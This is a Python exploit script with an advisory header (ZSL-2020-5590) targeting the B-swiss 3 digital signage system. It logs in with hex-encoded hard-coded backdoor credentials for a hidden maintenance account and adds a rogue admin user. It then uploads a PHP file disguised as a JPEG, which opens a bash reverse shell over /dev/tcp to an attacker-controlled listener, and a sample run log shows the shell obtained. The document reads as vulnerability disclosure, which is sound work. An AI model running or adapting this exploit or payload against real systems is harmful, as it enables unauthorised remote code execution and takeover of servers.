B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution

`#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
#  
#  
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution  
#  
#  
# Vendor: B-Swiss SARL | b-tween Sarl  
# Product web page: https://www.b-swiss.com  
# Affected version: 3.6.5  
# 3.6.2  
# 3.6.1  
# 3.6.0  
# 3.5.80  
# 3.5.40  
# 3.5.20  
# 3.5.00  
# 3.2.00  
# 3.1.00  
#  
# Summary: Intelligent digital signage made easy. To go beyond the  
# possibilities offered, b-swiss allows you to create the communication  
# solution for your specific needs and your graphic charter. You benefit  
# from our experience and know-how in the realization of your digital  
# signage project.  
#  
# Desc: The application suffers from an "authenticated" arbitrary  
# PHP code execution. The vulnerability is caused due to the improper  
# verification of uploaded files in 'index.php' script thru the 'rec_poza'  
# POST parameter. This can be exploited to execute arbitrary PHP code  
# by uploading a malicious PHP script file that will be stored in  
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"  
# account 'admin_m' which has the highest privileges in the application,  
# an attacker can use these hard-coded credentials to authenticate and  
# use the vulnerable image upload functionality to execute code on the  
# server.  
#  
# ========================================================================================  
# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777  
# [*] Checking target...  
# [*] Good to go!  
# [*] Checking for previous attempts...  
# [*] All good.  
# [*] Getting backdoor session...  
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2  
# [*] Starting callback listener child thread  
# [*] Starting handler on port 7777  
# [*] Adding GUI credentials: test:123456  
# [*] Executing and deleting stager file  
# [*] Connection from 192.168.10.11:40080  
# [*] You got shell!  
# id ; uname -or  
# uid=33(www-data) gid=33(www-data) groups=33(www-data)  
# 4.15.0-20-generic GNU/Linux  
# exit  
# *** Connection closed by remote host ***  
# [?] Want me to remove the GUI credentials? y  
# [*] Removing...  
# [*] t00t!  
# lqwrm@metalgear:~/prive$   
# ========================================================================================  
#  
# Tested on: Linux 5.3.0-46-generic x86_64  
# Linux 4.15.0-20-generic x86_64  
# Linux 4.9.78-xxxx-std-ipv6-64  
# Linux 4.7.0-040700-generic x86_64  
# Linux 4.2.0-27-generic x86_64  
# Linux 3.19.0-47-generic x86_64  
# Linux 2.6.32-5-amd64 x86_64  
# Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64  
# macOS 10.13.5  
# Microsoft Windows 7 Business Edition SP1 i586  
# Apache/2.4.29 (Ubuntu)  
# Apache/2.4.18 (Ubuntu)  
# Apache/2.4.7 (Ubuntu)  
# Apache/2.2.22 (Win64)  
# Apache/2.4.18 (Ubuntu)  
# Apache/2.2.16 (Debian)  
# PHP/7.2.24-0ubuntu0.18.04.6  
# PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1  
# PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1  
# PHP/5.6.31  
# PHP/5.6.30-10+deb.sury.org~xenial+2  
# PHP/5.5.9-1ubuntu4.17  
# PHP/5.5.9-1ubuntu4.14  
# PHP/5.3.10  
# PHP/5.3.13  
# PHP/5.3.3-7+squeeze16  
# PHP/5.3.3-7+squeeze17  
# MySQL/5.5.49  
# MySQL/5.5.47  
# MySQL/5.5.40  
# MySQL/5.5.30  
# MySQL/5.1.66  
# MySQL/5.1.49  
# MySQL/5.0.77  
# MySQL/5.0.12-dev  
# MySQL/5.0.11-dev  
# MySQL/5.0.8-dev  
# phpMyAdmin/3.5.7  
# phpMyAdmin/3.4.10.1deb1  
# phpMyAdmin/3.4.7  
# phpMyAdmin/3.3.7deb7  
# WampServer 3.2.0  
# Acore Framework 2.0  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# Macedonian Information Security Research and Development Laboratory  
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience  
#  
#  
# Advisory ID: ZSL-2020-5590  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php  
#  
#  
# 13.06.2020  
#  
  
from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr  
from http.cookiejar import CookieJar# oOo #raJeikooC tropmi rajeikooc.ptth mofr  
from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf  
from time import sleep# | 01 | 04 | #peels trompi emit morf  
import urllib.request# | | | | #tseuqer.billru tropmi  
import urllib.parse# | | | | #esrap.billru tropmi  
import telnetlib# | | | #biltenlet tropmi  
import threading# | | | | #gnidaerht tropmi  
import requests# | | | | #stseuqer tropmi  
import socket# | | o | #tekcos tropmi  
import sys,re# | | | #er,sys tropmi  
############## #-----------------+-----------------# ##############  
############### oOo ###############  
################ | ################  
#################### Y ####################  
############################ _ ############################  
###############################################################################################  
  
class Sign:  
  
def __init__(self):  
self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"  
self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"  
self.password = b"\x44\x50\x36\x25\x57\x33\x64"  
self.agent = "SignageBot/1.02"  
self.fileid = "251"  
self.payload = None  
self.answer = False  
self.params = None  
self.rhost = None  
self.lhost = None  
self.lport = None  
self.send = None  
  
def env(self):  
if len(sys.argv) != 4:  
self.usage()  
else:  
self.rhost = sys.argv[1]  
self.lhost = sys.argv[2]  
self.lport = int(sys.argv[3])  
if not "http" in self.rhost:  
self.rhost = "http://{}".format(self.rhost)  
  
def usage(self):  
self.roger()  
print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))  
print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0]))  
exit(0)  
  
def roger(self):  
waddup = """  
____________________  
/ \\  
! B-swiss 3 !  
! RCE !  
\____________________/  
! !  
! !  
L_ !  
/ _)!  
/ /__L  
____________/ (____)  
(____)  
____________ (____)  
\_(____)  
! !  
! !  
\__/   
"""  
print(waddup)  
  
def test(self):  
print("[*] Checking target...")  
try:  
r = requests.get(self.rhost)  
response = r.text  
if not "B-swiss" in response:  
print("[!] Not a b-swiss system")  
exit(0)  
if "B-swiss" in response:  
print("[*] Good to go!")  
next  
else:  
exit(-251)  
except Exception as e:  
print("[!] Ney ney: {msg}".format(msg=e))  
exit(-1)  
  
def login(self):  
token = ""  
cj = CookieJar()  
self.params = {"locator" : "visitor.ProcessLogin",  
"username" : self.username,  
"password" : self.password,  
"x" : "0",  
"y" : "0"}  
  
damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))  
damato.addheaders.pop()  
damato.addheaders.append(("User-Agent", self.agent))  
  
try:  
print("[*] Getting backdoor session...")  
damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))  
for cookie in cj:  
token = cookie.value  
print("[*] Got master backdoor cookie: "+token)  
except urllib.request.URLError as e:  
print("[!] Connection error: {}".format(e.reason))  
  
return token  
  
def upload(self):  
j = "\r\n"  
self.cookies = {"PNU_RAD_LIB" : self.rtoken}  
self.headers = {"Cache-Control" : "max-age=0",  
"Content-Type" : "multipart/form-data; boundary=----j",  
"User-Agent" : self.agent,  
"Accept-Encoding" : "gzip, deflate",  
"Accept-Language" : "en-US,en;q=0.9",  
"Connection" : "close"}  
  
self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"  
  
print("[*] Adding GUI credentials: test:123456")  
# rec_adminlevel values:  
# ----------------------  
# 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)  
# 7 - "B-swiss admin" <---------------------------------------------------------------------------------------+  
# 8 - Other |  
# |  
self.send = "------j{}Content-Disposition: form-data; ".format(j)# |  
self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |  
self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |  
self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |  
self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)# |  
self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |  
self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |  
self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |  
self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |  
self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |  
self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |  
self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)# |  
self.send += "name=\"rec_email\"{}[email protected]{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |  
self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |  
self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |  
self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |  
self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+  
self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)  
self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)  
self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)  
self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)  
self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)  
self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)  
self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)  
  
requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)  
print("[*] Executing and deleting stager file")  
r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")  
sleep(1)  
  
self.answer = input("[?] Want me to remove the GUI credentials? ").strip()  
if self.answer[0] == "y" or self.answer[0] == "Y":  
print("[*] Removing...")  
requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies)  
if self.answer[0] == "n" or self.answer[0] == "N":  
print("[*] Cool!")  
print("[*] t00t!")  
exit(-1)  
  
def razmisluju(self):  
print("[*] Starting callback listener child thread")  
konac = threading.Thread(name="ZSL", target=self.phone)  
konac.start()  
sleep(1)  
self.upload()  
  
def fish(self):  
r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False)  
response = r.text  
print("[*] Checking for previous attempts...")  
if not ".php" in response:  
print("[*] All good.")  
elif "251.php" in response:  
print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid))  
  
def phone(self):  
telnetus = telnetlib.Telnet()  
print("[*] Starting handler on port {}".format(self.lport))  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.bind(("0.0.0.0", self.lport))  
while True:  
try:  
s.settimeout(7)  
s.listen(1)  
conn, addr = s.accept()  
print("[*] Connection from {}:{}".format(addr[0], addr[1]))  
telnetus.sock = conn  
except socket.timeout as p:  
print("[!] No outgoing calls :( ({msg})".format(msg=p))  
print("[+] Check your port mappings or increase timeout")  
s.close()  
exit(0)  
break  
  
print("[*] You got shell!")  
telnetus.interact()  
conn.close()  
  
def main(self):  
self.env()  
self.test()  
self.fish()  
self.rtoken = self.login()  
self.razmisluju()  
  
if __name__ == '__main__':  
Sign().main()  
`